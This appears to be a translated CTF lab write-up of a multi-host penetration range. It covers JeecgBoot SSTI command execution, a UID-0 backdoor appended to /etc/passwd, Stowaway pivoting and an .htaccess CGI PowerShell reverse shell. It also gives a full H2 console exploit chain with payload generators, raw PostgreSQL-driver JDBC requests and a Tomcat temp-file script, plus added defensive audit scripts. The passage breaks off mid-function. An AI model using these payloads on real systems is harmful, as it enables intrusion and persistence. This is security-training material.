Flowchart:
The player takes the role of a penetration testing engineer and, following the tasks, penetrates the specified network environment to obtain key assets, while also performing a security review of the specified scenario configuration. The process covers information gathering, initial penetration, lateral movement, privilege escalation, obtaining high-level domain privileges, and maintaining long-term access. The scenario has 8 flags, spread across different target machines.
Scanning with fscan
Fscan-wiki | security scanning knowledge base
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# fscan -h 39.101.71.180
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[994ms] 已选择服务扫描模式
[994ms] 开始信息扫描
[994ms] 最终有效主机数量: 1
[994ms] 开始主机扫描
[994ms] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[995ms] 有效端口数量: 233
[1.1s] [*] 端口开放 39.101.71.180:22
[1.1s] [*] 端口开放 39.101.71.180:80
[1.1s] [*] 端口开放 39.101.71.180:8081
[1.2s] [*] 端口开放 39.101.71.180:3306
[4.0s] 扫描完成, 发现 4 个开放端口
[4.0s] 存活端口数量: 4
[4.0s] 开始漏洞扫描
[4.1s] POC加载完成: 总共387个,成功387个,失败0个
[4.1s] [*] 网站标题 http://39.101.71.180 状态码:200 长度:14323 标题:FinancePro ERP系统
[5.1s] [*] 网站标题 http://39.101.71.180:8081 状态码:200 长度:1766 标题:""
[44.6s] 扫描已完成: 6/6
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# nmap 8.145.35.203 -p 22,80,3306,8081 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-07 10:57 EST
Nmap scan report for 8.145.35.203
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
3306/tcp open mysql MySQL 5.7.33-0ubuntu0.16.04.1
8081/tcp open http nginx 1.18.0 (Ubuntu)
The web service on port 80 is a static page with nothing of interest (directory brute-forcing finds nothing either).
Port 8081 serves the JeecgBoot backend API documentation.
Here the JeecgBoot exploitation tool can be used directly (if it fails at startup with "could not find or load main class Main", run it under JDK 8).
GitHub - MInggongK/jeecg-: jeecg combined vulnerability exploitation tool
Use the JeecgBoot jmreport/loadTableData SSTI (template injection) vulnerability to execute commands. Command execution is restricted, though: as soon as I use certain special characters it errors out, and the length of the returned output is limited.
The pwd command gives the site's current working directory. Since the scan found MySQL, the site's configuration file very likely holds the MySQL connection details, but rummaging through the directories turned up no useful config file. The working directory does contain a jar, and the site is most likely run from that jar.
Simply cp the jar into the port 80 web root /var/www/html, then request its path to download it.
cp jeecg-system-start-3.5.3.jar /var/www/html
This reports execution failure, but it actually succeeded; requesting IP/jeecg-system-start-3.5.3.jar downloads the jar.
Once downloaded, unpack the jar; a global search for 3306 immediately turns up the MySQL configuration:
username: root
password: oZOgpwlvgh2N01eS
Then connect to the database with MDUT.
GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend (extended edition)
Here UDF privilege escalation is used to enable command execution, and then a privileged account is written to /etc/passwd.
┌──(root㉿kali)-[~/Desktop/ChunQiu/Finance]
└─# openssl passwd -6 123123 # generate the password hash
$6$VXmoBe/EfJOQLdHL$x2RU3nRSx3SL0o1mwu/The7PNMythhSMUnbeQD.hHrn9.IM51yD9ivqGy3Pw9pvSYZhOJ1ysvp80nbvbGcHW8/
# write it to /etc/passwd (the hash contains many special characters, so it is base64-encoded and decoded on write)
echo YzF0cnVzOiQ2JGlqL1o4Y3FxYXdPQTJzR2skYW1EVzVWZnhJMklsUURUem1lRG9XYTFKZlRJYjBsTm8yVGFMc3E3c3JsTWNEWFFiV1k3dUNJaE1zZWE0SE8uN2dQSDFxcVUyQkI3THZlN2p6Ny5WWTA6MDowOnJvb3Q6L2hvbWUvYzF0cnVzOi9iaW4vYmFzaA== |base64 -d>> /etc/passwd
Then log in with the account c1trus and password 123123.
PS: I suspect the /etc/passwd write step could also be done from the JeecgBoot exploitation tool, but I never got it to work.
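The backdoor above leaves /etc/passwd with a second UID-0 entry whose hash sits in passwd itself rather than in /etc/shadow, which is exactly what a host audit should catch. Added example, not from the writeup or any tool it mentions: the passwd sample is constructed, and audit_passwd_file() runs the same checks on a live file.

```python
"""Audit /etc/passwd for planted privileged accounts (added example)."""
import re
from typing import List, Tuple

# Constructed sample: a normal passwd excerpt plus a planted UID-0 account whose
# password field carries a crypt hash instead of the usual "x".
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
c1trus:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:0:0:root:/home/c1trus:/bin/bash
"""

# Password-field values that mean "hash lives in /etc/shadow" or "locked".
# Anything else is a usable hash stored in passwd itself, bypassing shadow.
SHADOWED = {"x", "*", "!", "!!", ""}
HASH_RE = re.compile(r"^\$(1|2[aby]?|5|6|y|7)\$")


def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) pairs for every suspicious passwd entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not uid.isdigit() or not gid.isdigit():
            findings.append((name, "non-numeric uid/gid"))
            continue
        # Any account other than root with UID 0 is a second root.
        if int(uid) == 0 and name != "root":
            findings.append((name, "extra UID-0 account"))
        # A hash in passwd is world-readable and skips shadow policy entirely.
        if pw not in SHADOWED:
            kind = "crypt hash" if HASH_RE.match(pw) else "unexpected value"
            findings.append((name, f"password field holds a {kind} instead of 'x'"))
    return findings


def audit_passwd_file(path: str = "/etc/passwd") -> List[Tuple[str, str]]:
    """Run audit_passwd over a real passwd file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for who, why in audit_passwd(SAMPLE_PASSWD):
        print(f"[!] {who}: {why}")
```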
Once in, check the network connections first: there is a Redis docker container, but nothing of interest in it, and the MySQL database holds nothing useful either.
Then look at the NIC information to find the internal subnet.
root@web01:/tmp# ifconfig
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
inet6 fe80::42:54ff:fe6c:9753 prefixlen 64 scopeid 0x20<link>
ether 02:42:54:6c:97:53 txqueuelen 0 (Ethernet)
RX packets 1129 bytes 51857 (51.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1136 bytes 68313 (68.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.10.22 netmask 255.255.255.0 broadcast 172.22.10.255
inet6 fe80::216:3eff:fe08:cb8d prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:08:cb:8d txqueuelen 1000 (Ethernet)
RX packets 29340 bytes 16868150 (16.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 81588 bytes 194571089 (194.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 28074 bytes 2843232 (2.8 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28074 bytes 2843232 (2.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethdeabb72: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::2cea:c2ff:feba:d702 prefixlen 64 scopeid 0x20<link>
ether 2e:ea:c2:ba:d7:02 txqueuelen 0 (Ethernet)
RX packets 1129 bytes 67663 (67.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1152 bytes 69529 (69.5 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
GitHub - ph4ntonn/Stowaway: 👻Stowaway -- Multi-hop Proxy Tool for pentesters
Because only ports 22, 3306, 80 and 8081 of this machine can pass the network boundary, we kill the SSH service on port 22 (open several SSH sessions beforehand; they are needed later), then upload the Stowaway agent to set up a proxy.
Stowaway: building a multi-level network proxy
# (run on the target web01)
root@web01:/# chmod +x linux_x64_agent
root@web01:/# ./linux_x64_agent -l 22
2025/11/15 02:25:19 [*] Starting agent node passively.Now listening on port 22
# (run on your VPS)
# ./linux_x64_admin -c $靶机IP:22
(admin) >> use 0
(node 0) >> socks 9999
The proxy is now up; vpsIP:9999 can be used as a pivot to reach the internal 10 subnet.
On Kali, configure /etc/proxychains4.conf and go through the proxy with proxychains.
On Windows, configure Proxifier to use the proxy (the address is your VPS IP).
Upload fscan to web01 and scan the internal 10 subnet.
root@web01:/root# ./FScan_2.0.1_linux_x64 -h 172.22.10.22/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] CIDR范围: 172.22.10.0-172.22.10.255
[1.8s] generate_ip_range_full
[1.8s] 解析CIDR 172.22.10.22/24 -> IP范围 172.22.10.0-172.22.10.255
[1.9s] 最终有效主机数量: 256
[1.9s] 开始主机扫描
[1.9s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.9s] [*] 目标 172.22.10.22 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.17 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.253 存活 (ICMP)
[1.9s] [*] 目标 172.22.10.88 存活 (ICMP)
[4.9s] 存活主机数量: 4
[4.9s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.10.22:6379
[4.9s] [*] 端口开放 172.22.10.22:80
[4.9s] [*] 端口开放 172.22.10.22:3306
[4.9s] [*] 端口开放 172.22.10.22:8081
[4.9s] [*] 端口开放 172.22.10.22:8080
[4.9s] [*] 端口开放 172.22.10.17:22
[4.9s] [*] 端口开放 172.22.10.88:21
[4.9s] [*] 端口开放 172.22.10.88:80
[4.9s] [*] 端口开放 172.22.10.88:445
[4.9s] [*] 端口开放 172.22.10.88:139
[4.9s] [*] 端口开放 172.22.10.88:135
[7.9s] 扫描完成, 发现 11 个开放端口
[7.9s] 存活端口数量: 11
[7.9s] 开始漏洞扫描
[7.9s] [*] NetInfo 扫描结果
目标主机: 172.22.10.88
主机名: web02
发现的网络接口:
IPv4地址:
└─ 172.22.10.88
[7.9s] [*] 网站标题 http://172.22.10.22 状态码:200 长度:14323 标题:FinancePro ERP系统
[8.0s] [+] NetBios 172.22.10.88 WORKGROUP\WEB02
[8.0s] [*] 网站标题 http://172.22.10.88 状态码:403 长度:199 标题:403 Forbidden
[8.0s] POC加载完成: 总共387个,成功387个,失败0个
[8.1s] [+] FTP服务 172.22.10.88:21 匿名登录成功!
[8.1s] [*] 网站标题 http://172.22.10.22:8080 状态码:404 长度:682 标题:HTTP Status 404 – Not Found
[8.1s] [*] 网站标题 http://172.22.10.22:8081 状态码:200 长度:1766 标题:""
[36.6s] 扫描已完成: 18/18
Scan results:
172.22.10.22  entry host, jeecgboot, Web01
172.22.10.88  WORKGROUP\WEB02, ftp
172.22.10.17  Ollama
172.22.10.253 gateway
The fscan scan shows web02 has the following ports open:
[4.9s] [*] 端口开放 172.22.10.88:21
[4.9s] [*] 端口开放 172.22.10.88:80
[4.9s] [*] 端口开放 172.22.10.88:445
[4.9s] [*] 端口开放 172.22.10.88:139
[4.9s] [*] 端口开放 172.22.10.88:135
Ports 135, 139 and 445 being open makes it easy to tell this is a Windows machine, and port 21 means it runs an FTP server.
Log in to the FTP server as anonymous; it holds two files, .htaccess and index.html.
root@web01:/root# ftp 172.22.10.88
Connected to 172.22.10.88.
220-FileZilla Server 中文版 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (172.22.10.88:root): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> ls
150 Opening data channel for directory listing of "/"
-rw-r--r-- 1 ftp ftp 18 Jun 27 2025 .htaccess
-rw-r--r-- 1 ftp ftp 46 Jun 11 2007 index.html
# download the files
ftp> bin # switch to binary mode; always do this when connecting from Linux to a Windows FTP server, otherwise downloaded binaries are corrupted (here the files are text, so it would not matter)
ftp> get index.html
ftp> get .htaccess
ftp> exit
View the file contents
root@web01:/root# cat index.html
<html><body><h1>It works!</h1></body></html>
root@web01:/root# cat .htaccess
Require all denied
root@web01:/root#
.htaccess is Apache's per-directory configuration file, used to control a directory's behaviour without touching the main configuration.
Here it contains Require all denied, so any request into the directory returns 403.
Requesting port 80 on Web02 does indeed return 403.
Deleting the contents of .htaccess makes the site accessible again. Replacing them with:
Options +ExecCGI
SetHandler cgi-script
makes Apache run every file in the directory as a CGI script.
Then I upload a hello.bat (any name will do) containing the reverse shell command.
First generate a base64-encoded PowerShell command:
Reverse shell generator
Then upload hello.bat with the following content to the FTP server:
@echo off
echo Content-Type: text/plain
echo.
powershell -e JABjAGwAaQBlAG.... (the generated base64 PowerShell payload)
Then start a listener and request http://172.22.10.88/hello.bat to receive the shell.
With this CGI reverse shell, running commands sometimes does not show flag.txt and sometimes does; the following command reads it reliably:
powershell -Command "Get-Content 'C:\users\administrator\desktop\f1ag.txt'"
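What makes the Web02 chain possible is that the anonymous-writable FTP root is also Apache's document root and per-directory overrides are honoured, so an uploaded .htaccess can switch the whole directory to an executable handler. Added example, not from the writeup: a Python auditor that walks a web root and flags .htaccess directives that change how files are executed; the sample tree is constructed in a temporary directory.

```python
"""Walk a web root and flag .htaccess directives that change how files execute (added example)."""
import os
import re
import tempfile
from typing import Dict, List

# Directives that make Apache execute or reinterpret files. In a directory that
# untrusted users can write to (here: the anonymous FTP root), any of these turns
# an uploaded file into server-side code. "Options -ExecCGI" is deliberately not matched.
RISKY_DIRECTIVES = [
    re.compile(r"^\s*SetHandler\s+\S+", re.I),
    re.compile(r"^\s*AddHandler\s+\S+", re.I),
    re.compile(r"^\s*AddType\s+\S+", re.I),
    re.compile(r"^\s*Options\b.*(?:\s|\+)(ExecCGI|Includes)\b", re.I),
]


def audit_htaccess_text(text: str) -> List[str]:
    """Return the offending directive lines found in one .htaccess body."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(rx.match(stripped) for rx in RISKY_DIRECTIVES):
            hits.append(stripped)
    return hits


def audit_htaccess_tree(root: str) -> Dict[str, List[str]]:
    """Map each .htaccess (path relative to root) to its risky directives; clean files are omitted."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = audit_htaccess_text(fh.read())
        if hits:
            report[os.path.relpath(path, root)] = hits
    return report


def build_sample_tree() -> str:
    """Constructed sample: Web02's original deny-all file in a subdir, the replaced one at the root."""
    root = tempfile.mkdtemp(prefix="htaccess-audit-")
    os.makedirs(os.path.join(root, "private"))
    with open(os.path.join(root, "private", ".htaccess"), "w") as fh:
        fh.write("Require all denied\n")
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("Options +ExecCGI\nSetHandler cgi-script\n")
    return root


if __name__ == "__main__":
    for rel, hits in audit_htaccess_tree(build_sample_tree()).items():
        print(f"[!] {rel}: {', '.join(hits)}")
```

Server-side, AllowOverride None on any user-writable directory (and keeping the FTP root out of the document root) makes Apache ignore such a file altogether.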
This machine blocks ICMP (ping), so during the earlier fscan scan the host liveness probe could not detect it, and naturally its open ports were never discovered.
After I had collected the flags from all the other machines and spent hours failing to find the last one, I asked the author and learned there was one more machine, 172.22.10.7.
Scan the C-class subnet from Web01 with fscan (-np skips the ping probe):
root@web01:~# ./FScan_2.0.1_linux_x64 -h 172.22.10.0/24 -nopoc -nobr -np
This machine turns out to have port 8080 open; next do a full-port scan to check.
root@web01:~# ./FScan_2.0.1_linux_x64 -h 172.22.10.7 -p all
The full-port scan confirms only 8080 is open.
Port 8080 shows the financial database management interface.
An error page reveals it is a Spring Boot application.
Scanning with SpringBoot Scan found no valid paths. Combining the Spring Boot and database keywords, one can guess it might be an H2 database; requesting /h2-console shows that the H2 DB is indeed there, and the H2 console is exposed without authentication.
Since I have only studied Java for two and a half months, this point was beyond my ability; after struggling for another five hours without breaking through, I asked a Java expert, @godown, to help take it down.
Below is @godown's solution.
The error page shows the H2 version is 2.1.214. To attack the H2 web console directly, even though the target has auto-creation of the test database enabled, outbound network access is still needed to use ClassPathXmlApplicationContext; without outbound access, commons-io is needed to write a file.
https://godownio.github.io/2025/05/06/jre17-huan-jing-xia-de-h2-jdbc-attack/
But the H2 web console can use other database drivers, and in a Tomcat environment a Tomcat temporary file can be used to reach ClassPathXmlApplicationContext without outbound access (that is, using AntPathMatcher.isPattern's parsing of environment variables and wildcards); here the PostgreSQL component is the one used.
First try the most general technique, the ascii-jar that bypasses dirty data; generate a jar with the payload below.
#!/usr/bin/env python
# author: c0ny1
# date 2022-02-13
from __future__ import print_function
import struct
import time
import zlib
# ASCIICompressor, isAllowBytes and wrap_jar come from c0ny1's accompanying compress module
from compress import *

allow_bytes = []
disallowed_bytes = [38, 60, 39, 62, 34, 40, 41]  # &<'>"()
for b in range(0, 128):  # ASCII
    if b in disallowed_bytes:
        continue
    allow_bytes.append(b)

if __name__ == '__main__':
    padding_char = 'A'
    raw_filename = 'poc.xml'
    zip_entity_filename = 'META-INF/resources/poc.xml'
    jar_filename = 'ascii02.jar'
    num = 1
    while True:
        # step1: generate the XML payload with the current padding and write it to disk
        javaCode = """<?xml version="1.0" encoding="UTF-8"?>
<!-- {PADDING_DATA} -->
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
        <property name="arguments">
            <list>
                <value>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</value>
            </list>
        </property>
    </bean>
    <bean id="classLoader" class="javax.management.loading.MLet"/>
    <bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
        <constructor-arg ref="decoder"/>
        <constructor-arg type="int" value="0"/>
        <constructor-arg type="int" value="5128"/>
    </bean>
    <bean factory-bean="clazz" factory-method="newInstance"/>
</beans>
"""
        padding_data = padding_char * num
        javaCode = javaCode.replace("{PADDING_DATA}", padding_data)
        f = open(raw_filename, 'w')
        f.write(javaCode)
        f.close()
        time.sleep(0.1)
        # step2: compress, then check whether each zip header field falls within the allowed ASCII range
        raw_data = bytearray(open(raw_filename, 'rb').read())
        compressor = ASCIICompressor(bytearray(allow_bytes))
        compressed_data = compressor.compress(raw_data)[0]
        crc = zlib.crc32(raw_data) % pow(2, 32)
        st_crc = struct.pack('<L', crc)
        st_raw_data = struct.pack('<L', len(raw_data) % pow(2, 32))
        st_compressed_data = struct.pack('<L', len(compressed_data) % pow(2, 32))
        # offset of the central directory = local file header (0x1e) + file name + compressed data
        st_cdzf = struct.pack('<L', len(compressed_data) + len(zip_entity_filename) + 0x1e)
        b_crc = isAllowBytes(st_crc, allow_bytes)
        b_raw_data = isAllowBytes(st_raw_data, allow_bytes)
        b_compressed_data = isAllowBytes(st_compressed_data, allow_bytes)
        b_cdzf = isAllowBytes(st_cdzf, allow_bytes)
        # step3: all four fields must consist of allowed bytes
        if b_crc and b_raw_data and b_compressed_data and b_cdzf:
            print('[+] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(
                b_crc, b_raw_data, b_compressed_data, b_cdzf, num, padding_char))
            # step4: save the final ascii jar
            output = open(jar_filename, 'wb')
            output.write(wrap_jar(raw_data, compressed_data, zip_entity_filename.encode()))
            output.close()
            print('[+] Generate {0} success'.format(jar_filename))
            break
        else:
            print('[-] CRC:{0} RDL:{1} CDL:{2} CDAFL:{3} Padding data: {4}*{5}'.format(
                b_crc, b_raw_data, b_compressed_data, b_cdzf, num, padding_char))
            num = num + 1
Write the file through the PostgreSQL loggerFile option:
POST /h2-console/login.do?jsessionid=5c80db64f648e5265fa86c4c8fe6d362 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
Content-Length: 141

language=en&name=Generic+PostgreSQL&setting=Generic+PostgreSQL&user=sa&password=sa&url={{urlenc(jdbc:postgresql:///?loggerLevel=DEBUG&loggerFile=C://Windows/Temp/ascii02.jar&)}}
Load it through socketFactory:
POST /h2-console/login.do?jsessionid=5c80db64f648e5265fa86c4c8fe6d362 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
X-Authorization: whoami
Content-Length: 141

language=en&setting=Generic+PostgreSQL&url={{urlenc(jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=jar:file:///C:/Windows/Temp/ascii02.jar!/META-INF/resources/poc.xml)}}
Going by the error messages, the jar was written successfully (ascii02 gives a ZipException, ascii03 a FileNotFoundException), but since the write goes through the log file, if the earlier part of the log disturbs the zip structure (the central directory entries and the EOCD record), the jar cannot be parsed.
Loading through the temporary file did not work either. My suspicion is that Tomcat finishes the upload request before Spring parses the parameters: code-breaking 205 took its parameter straight from GET, whereas here the parameters are clearly received via POST. A reasonable guess at this point is that two requests are needed, one to leave a file resident and a second to load it with CPX (ClassPathXmlApplicationContext).
A trick here:
Reading through the file protocol directly does not produce a file-not-found error.
From the jar-writing experience above, jar: can be used to probe whether a file exists; unfortunately jar: does not combine with wildcards (verified in practice), so the jar:file://**/*.tmp probe cannot be used.
First plant a resident file (for the principle, see m4x's research on MySQL JDBC attacks without outbound access). At first I did not add the trailing --xxxxxx, because when the XML is loaded there must be absolutely no stray characters after </beans>, and without the trailing --xxxxxx a few stray bytes after </beans> show up as garbage instead of EOF, which makes the load fail.
Later I found that adding a trailing --xxxxxx, as long as it is not --xxxxxx--, still keeps the upload resident, and with that trailer the file gets a clean EOF.
Solution:
import socket
import time

HOST = '172.22.10.7'
PORT = 8080

if __name__ == '__main__':
    payload = '''
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
        <property name="arguments">
            <list>
                <value>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</value>
            </list>
        </property>
    </bean>
    <bean id="classLoader" class="javax.management.loading.MLet"/>
    <bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
        <constructor-arg ref="decoder"/>
        <constructor-arg type="int" value="0"/>
        <constructor-arg type="int" value="5128"/>
    </bean>
    <bean factory-bean="clazz" factory-method="newInstance"/>
</beans>'''
    # Multipart upload whose declared Content-Length is far larger than what is sent,
    # so Tomcat keeps the request open and its temp file on disk. The trailing --xxxxxx
    # (not the closing --xxxxxx--) leaves the part resident but ends the file cleanly.
    a = b'''POST / HTTP/1.1
Host: 172.22.10.7:8080
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: multipart/form-data; boundary=xxxxxx
User-Agent: python-requests/2.32.3
Content-Length: 1296800

--xxxxxx
Content-Disposition: form-data; name="file"; filename="a.txt"

{{payload}}
--xxxxxx
'''.replace(b"\n", b"\r\n").replace(b"{{payload}}", payload.encode())
    s = socket.socket()
    s.connect((HOST, PORT))
    s.sendall(a)
    time.sleep(1111111)  # hold the connection open so the temp file stays resident
What gets written is a generic Spring echo (not a persistent memory shell); in an environment without Spring it would have to be redone.
POST /h2-console/login.do?jsessionid=c6642992d40cdda702b841ff6ab98bb0 HTTP/1.1
Host: 172.22.10.7:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Referer: http://172.22.10.7:8080/h2-console/login.do?jsessionid=fd406a4fd140c1aae15e2d29715a4291
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://172.22.10.7:8080
X-Authorization: type f1111laag.txt
Content-Length: 141

language=en&setting=Generic+PostgreSQL&url={{urlenc(jdbc:postgresql:///?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=file://${catalina.home}/work/Tomcat/localhost/ROOT/*.tmp)}}
flag{9b639ea2-d4bc-4403-ac58-8ab8d50f743b}
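Each step of @godown's chain is an ordinary-looking POST to /h2-console/login.do; what turns it into a file write or a class load is the url field, which selects the PostgreSQL driver and passes options such as loggerFile or socketFactory. Added example, not from the writeup or @godown's code: a detection routine that decodes such a form body and inspects the JDBC URL's options, with request bodies constructed after the shape of the requests above.

```python
"""Flag dangerous JDBC URLs submitted to the H2 web console (added example)."""
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlencode

# Driver options that turn a JDBC connection into a file write or a class load.
# Compared case-insensitively.
DANGEROUS_PARAMS = {
    "socketfactory", "socketfactoryarg",   # pgjdbc: instantiate an arbitrary class
    "sslfactory", "sslfactoryarg",         # pgjdbc: same trick through the SSL factory
    "loggerfile", "loggerlevel",           # older pgjdbc: write the driver log anywhere
    "init",                                # H2: INIT=RUNSCRIPT FROM ...
    "autodeserialize", "queryinterceptors", "statementinterceptors",  # MySQL Connector/J
}
# Values that point at files, archives, property expansion or wildcards.
SUSPICIOUS_VALUE = re.compile(r"(jar:|file:|\$\{|\*|runscript|classpathxml)", re.I)


def jdbc_params(url: str) -> Dict[str, str]:
    """Split the option part of a JDBC URL (?a=b&c=d or ;A=B) into a dict."""
    params = {}
    for chunk in re.split(r"[?;&]", url)[1:]:
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            params[key.strip().lower()] = value
    return params


def inspect_h2_login(body: str) -> List[str]:
    """Return reasons an H2 console login body looks like driver abuse (empty if clean)."""
    form = parse_qs(body, keep_blank_values=True)
    url = form.get("url", [""])[0]
    reasons = []
    if not url.lower().startswith("jdbc:h2:"):
        reasons.append("non-H2 driver URL: " + url.split("?")[0].split(";")[0])
    for key, value in jdbc_params(url).items():
        if key in DANGEROUS_PARAMS:
            reasons.append(f"dangerous option {key}={value}")
        elif SUSPICIOUS_VALUE.search(value):
            reasons.append(f"suspicious value in {key}={value}")
    return reasons


def sample_bodies() -> Dict[str, str]:
    """Constructed request bodies shaped like the console logins above."""
    pg_write = ("jdbc:postgresql:///?loggerLevel=DEBUG"
                "&loggerFile=C://Windows/Temp/constructed.jar&")
    pg_load = ("jdbc:postgresql:///?socketFactory="
               "org.springframework.context.support.ClassPathXmlApplicationContext"
               "&socketFactoryArg=file://${catalina.home}/work/Tomcat/localhost/ROOT/*.tmp")
    return {
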